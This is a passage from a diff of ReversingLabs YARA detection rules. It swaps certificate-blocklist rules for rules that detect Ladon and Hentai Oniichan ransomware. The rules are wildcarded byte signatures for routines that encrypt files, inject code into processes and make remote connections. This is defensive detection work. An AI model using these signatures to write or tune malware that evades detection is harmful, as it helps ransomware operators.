+            ?? 89 0C 95 ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 7C C0 81 FA ?? ?? ?? ?? 7D 3B 56 8D 34 95 ?? ?? ?? ?? 8B 0E 33 4E ?? 83 C6 ??
+            81 E1 ?? ?? ?? ?? 33 4E ?? 8B C1 83 E0 ?? D1 E9 8B 04 85 ?? ?? ?? ?? 33 86 ?? ?? ?? ?? 33 C1 89 46 ?? 81 FE ?? ?? ?? ??
+            7C CE 5E 8B 0D ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 81 E1 ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 8B C1 83 E0 ?? D1 E9 33 0C 85 ?? ?? ??
+            ?? 33 0D ?? ?? ?? ?? 33 C0 89 0D ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 40 A3 ?? ?? ?? ?? 8B C1 C1 E8 ?? 33 C8 8B C1 25 ?? ??
+            ?? ?? C1 E0 ?? 33 C8 8B C1 25 ?? ?? ?? ?? C1 E0 ?? 33 C8 8B C1 C1 E8 ?? 33 C1 C3
+        }
+		$decrypt_3 = {
+            A1 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 8C C7 00 00 00 33 D2 EB 0C 8D A4 24 ?? ?? ?? ?? EB 03 8D 49 ?? 8B 0C 95 ?? ?? ?? ?? 33
+            0C 95 ?? ?? ?? ?? 42 81 E1 ?? ?? ?? ?? 33 0C 95 ?? ?? ?? ?? 8B C1 83 E0 ?? D1 E9 33 0C 85 ?? ?? ?? ?? 33 0C 95 ?? ?? ??
+            ?? 89 0C 95 ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 7C C0 81 FA ?? ?? ?? ?? 7D 3B 56 8D 34 95 ?? ?? ?? ?? 8B 0E 33 4E ?? 83 C6 ??
+            81 E1 ?? ?? ?? ?? 33 4E ?? 8B C1 83 E0 ?? D1 E9 8B 04 85 ?? ?? ?? ?? 33 86 ?? ?? ?? ?? 33 C1 89 46 ?? 81 FE ?? ?? ?? ??
+            7C CE 5E 8B 0D ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 81 E1 ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 8B C1 83 E0 ?? D1 E9 33 0C 85 ?? ?? ??
+            ?? 33 0D ?? ?? ?? ?? 33 C0 89 0D ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 40 A3 ?? ?? ?? ?? 8B C1 C1 E8 ?? 33 C8 8B C1 25 ?? ??
+            ?? ?? C1 E0 ?? 33 C8 8B C1 25 ?? ?? ?? ?? C1 E0 ?? 33 C8 8B C1 C1 E8 ?? 33 C1 C3
+        }
+		$entrypoint_all = {
+            83 EC ?? E8 ?? ?? ?? ?? 50 FF 15
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IMRAN IT SERVICES LTD" and ( pe.signatures [ i ] . serial == "00:fd:7b:7a:86:78:a6:71:81:a5:4b:c7:49:9e:ba:44:da" or pe.signatures [ i ] . serial == "fd:7b:7a:86:78:a6:71:81:a5:4b:c7:49:9e:ba:44:da" ) and 1548028800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( ( $file_loop_1 and $encrypt_data_1 and $decrypt_data_1 and $decrypt_strings_1 and $decrypt_1 ) or ( $file_loop_2 and $encrypt_data_2 and $decrypt_data_2 and $decrypt_strings_2 and $decrypt_2 ) or ( $file_loop_3 and $encrypt_data_3 and $decrypt_data_3 and $decrypt_3 ) ) and ( $entrypoint_all at pe.entry_point ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Ebbdd6Cdeda40Ca64513280Ecd625C54 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Ladon : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Ladon ransomware."
 		author = "ReversingLabs"
-		id = "2cf769dc-5108-5f18-a51e-e152180a2b66"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "ebc8f957-cdcf-54eb-bd02-74088cf51768"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3120-L3138"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1d419f2fe2a9bf744bdde48adc50e0bc48746f1576f96570385a2a1c9ba92d21"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Ladon.yara#L1-L101"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "979e3f3bf6a67bf10b6bfdd2eeb722d8836096076b7e88c6d4aca041a1a9eecb"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Ladon"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66
+            3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2
+            75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ??
+            83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 57 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 75 ?? 8D 85
+            ?? ?? ?? ?? 53 56 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF 85 DB 74 ?? 90 8B 45 ?? 8B
+            34 B8 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 66 8B 08 66 3B 0E 75 ?? 66 85 C9 74 ??
+            66 8B 48 ?? 66 3B 4E ?? 75 ?? 83 C0 ?? 83 C6 ?? 66 85 C9 75 ?? 33 C0 EB ?? 1B C0 83
+            C8 ?? 85 C0 74 ?? 47 3B FB 72 ?? 8B 75 ?? 8B 7D ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF
+            15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 75 ?? 33 DB 83 F8 ?? 0F
+            95 C3 FF 15 ?? ?? ?? ?? 5E 8B C3 5B 5F 8B E5 5D C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 FF 75 ?? 33 DB 89 5D ?? E8 ?? ?? ?? ?? 8B F8 83
+            C4 ?? 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 83 3F ?? 0F 85 ?? ?? ?? ?? 53 68 ?? ?? ?? ??
+            FF 77 ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF
+            77 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF
+            77 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF
+            77 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF
+            77 ?? E8 ?? ?? ?? ?? 8B C8 83 C4 ?? 89 4D ?? 85 C9 0F 84 ?? ?? ?? ?? 83 3E ?? 0F 85
+            ?? ?? ?? ?? 8B 45 ?? 83 38 ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 83 38 ?? 0F 85 ?? ?? ?? ??
+            8B 45 ?? 83 38 ?? 0F 85 ?? ?? ?? ?? 83 39 ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 70
+            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? FF 75 ?? 33 FF C7 45
+            ?? ?? ?? ?? ?? 89 5D ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? 83 3E ?? 75 ?? 57
+            68 ?? ?? ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? FF 70 ?? 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74
+            ?? 8D 45 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 8D 7B ?? A1 ??
+            ?? ?? ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 1D ?? ?? ?? ?? 85 F6 74 ?? 56 E8
+            ?? ?? ?? ?? 83 C4 ?? 8B C7 5F 5E 5B 8B E5 5D C3 FF 76 ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 78 ?? 85 FF 74 ?? 8B 47 ?? 89 45
+        }
+		$encrypt_files_p2 = {
+            8B 70 ?? 8D 4E ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 04 75 ?? ?? ?? ?? 50 6A ?? FF 15 ??
+            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 84 9D ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 0C 75
+            ?? ?? ?? ?? 51 50 8D 46 ?? 50 8B 45 ?? FF 70 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 3F
+            43 85 FF 75 ?? 68 ?? ?? ?? ?? C7 84 9D ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? E8 ?? ?? ?? ?? 8B 7D ?? 8B 77 ?? 8D 4E ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 46 ?? 50
+            6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B C8 89 4D ?? 85 C9 0F 84 ?? ?? ?? ??
+            8B C6 99 6A ?? 2B C2 D1 F8 6A ?? 89 45 ?? 8D 45 ?? 50 51 6A ?? 56 FF 77 ?? FF 15 ??
+            ?? ?? ?? 8B 7D ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 57 8B 7D ?? 8B F0 57 56 FF 15 ?? ?? ?? ?? 56 FF 15
+            ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 57 6A ?? FF 15 ?? ??
+            ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 45 ?? FF 70 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ??
+            ?? ?? 8B 7D ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 05 ?? ?? ??
+            ?? ?? ?? ?? ?? 85 FF 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 85 DB 74 ?? FF B4 B5 ??
+            ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 46 3B F3 72 ?? 8B 45 ?? 5F 5E
+            5B 8B E5 5D C3
+        }
+		$remote_connection = {
+            8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 50 68 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B E5 5D C3 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 85 C0 0F 88 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 78 ?? 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ??
+            85 F6 74 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ??
+            83 C4 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5E 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IT PUT LIMITED" and ( pe.signatures [ i ] . serial == "00:eb:bd:d6:cd:ed:a4:0c:a6:45:13:28:0e:cd:62:5c:54" or pe.signatures [ i ] . serial == "eb:bd:d6:cd:ed:a4:0c:a6:45:13:28:0e:cd:62:5c:54" ) and 1549238400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $remote_connection )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_61Da676C1Dcfcf188276E2C70D68082E : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Hentaioniichan : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Hentai Oniichan ransomware."
 		author = "ReversingLabs"
-		id = "d974b740-38fa-564d-b4c6-8955568a4e77"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "cd5e916f-7195-5bb6-abff-b08231053f9a"
+		date = "2021-03-05"
+		modified = "2021-03-05"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3140-L3156"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4f8af4a5c9812e6559218e387e32bc02cb0adcd40d9d4963fefc929f6101ae9a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.HentaiOniichan.yara#L1-L140"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "153526e5a2f05bc8e3f77d83eefce6b4cd962ea093b6f1c0ab8fcabe8d8a7ad9"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "HentaiOniichan"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 55 ?? 53
+            57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ??
+            51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ?? ?? ?? 8A 01 88 85 ?? ?? ??
+            ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? E9 ??
+            ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 8A C3 75 ?? B0 ?? 2B
+            CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D ?? ?? ?? ?? 56 1B C0 89 9D ?? ?? ?? ??
+            23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? F7 D8
+        }
+		$find_files_p2 = {
+            1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75
+            ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ??
+            ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74 ??
+            80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ??
+            ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ??
+            74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15 ?? ?? ??
+            ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C3 8B 4D ??
+            5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3
+        }
+		$inject_code_into_process = {
+            33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ?? 8B C6 8D 8D
+            ?? ?? ?? ?? 66 8B 11 66 3B 10 75 ?? 66 85 D2 74 ?? 66 8B 51 ?? 66 3B 50 ?? 75 ?? 83
+            C1 ?? 83 C0 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 75 ?? FF B5 ?? ?? ??
+            ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? FF 15 ?? ?? ?? ?? 39 85 ?? ?? ?? ??
+            74 ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? C6 45 ??
+            ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2
+            ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ??
+            ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2
+            ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 8D ??
+            ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 3B 8D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 8B
+            4D ?? 85 C9 74 ?? 51 8B D0 E8 ?? ?? ?? ?? 8B 4D ?? B8 ?? ?? ?? ?? 8B 75 ?? 83 C4 ??
+            2B CE F7 E9 C1 FA ?? 8B C2 C1 E8 ?? 03 C2 8D 0C 40 8B C6 C1 E1 ?? 81 F9 ?? ?? ?? ??
+            72 ?? 8B 76 ?? 83 C1 ?? 2B C6 83 C0 ?? 83 F8 ?? 77 ?? 51 56 E8 ?? ?? ?? ?? 83 C4 ??
+            8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D 8B E3
+            5B C3 E8
+        }
+		$remote_connection_p1 = {
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? C7 45
+            ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 28 45
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 29 45 ?? 0F 28 45
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? 50 0F 29 45 ?? E8 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45
+            ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            0F 28 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? 0F 29 45 ??
+            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            0F 28 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 29 45
+        }
+		$remote_connection_p2 = {
+            0F 28 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? 50 0F 29 45
+            ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 0F 43 95
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41
+            ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? B8 ??
+            ?? ?? ?? 2B C1 83 F8 ?? 0F 82 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 51
+            0F 43 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ??
+            0F 43 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 6A ?? 6A ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 83 BD ?? ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 03 C1 50 51 8D 85 ?? ?? ?? ?? 50 8D 4D ??
+            E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43
+            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 C4 ?? 8B F0 83 FA ?? 72 ?? 8B
+            8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ??
+            2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4
+        }
+		$encrypt_files = {
+            8B FF 55 8B EC 83 EC ?? 8B 4D ?? 89 4D ?? 53 56 8B 75 ?? 57 8B 7D ?? 89 7D ?? 85 C9
+            0F 84 ?? ?? ?? ?? 85 FF 75 ?? E8 ?? ?? ?? ?? 83 20 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C8 ?? E9 ?? ?? ?? ?? 8B C6 8B D6 C1 FA ?? 83 E0 ?? 6B C0 ?? 89
+            55 ?? 8B 14 95 ?? ?? ?? ?? 89 45 ?? 8A 5C 02 ?? 80 FB ?? 74 ?? 80 FB ?? 75 ?? 8B C1
+            F7 D0 A8 ?? 74 ?? 8B 45 ?? F6 44 02 ?? ?? 74 ?? 6A ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ??
+            83 C4 ?? 56 E8 ?? ?? ?? ?? 59 84 C0 74 ?? 84 DB 74 ?? FE CB 80 FB ?? 0F 87 ?? ?? ??
